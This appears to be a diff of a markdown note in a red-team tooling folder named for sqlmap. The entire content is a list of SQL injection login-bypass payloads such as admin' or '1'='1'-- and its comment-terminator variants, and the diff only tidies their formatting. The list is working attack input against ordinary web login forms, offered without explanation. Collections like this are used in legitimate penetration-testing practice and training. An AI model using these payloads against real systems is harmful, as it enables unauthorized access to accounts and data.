CedarvilleCyber/RedTeamVault/Tooling/Enumeration/Sqlmap.md

 admin' or '1'='1'--
 admin' or '1'='1'#
 admin' or '1'='1'/*
-*/ -- Close to fix syntax highlighting admin'or 1=1 or ''='
+admin'or 1=1 or ''='
 admin' or 1=1
 admin' or 1=1--
 admin' or 1=1#
 admin' or 1=1/*
-*/ -- Close to fix syntax highlighting admin') or ('1'='1 admin') or ('1'='1'--
+admin') or ('1'='1
+admin') or ('1'='1'--
 admin') or ('1'='1'#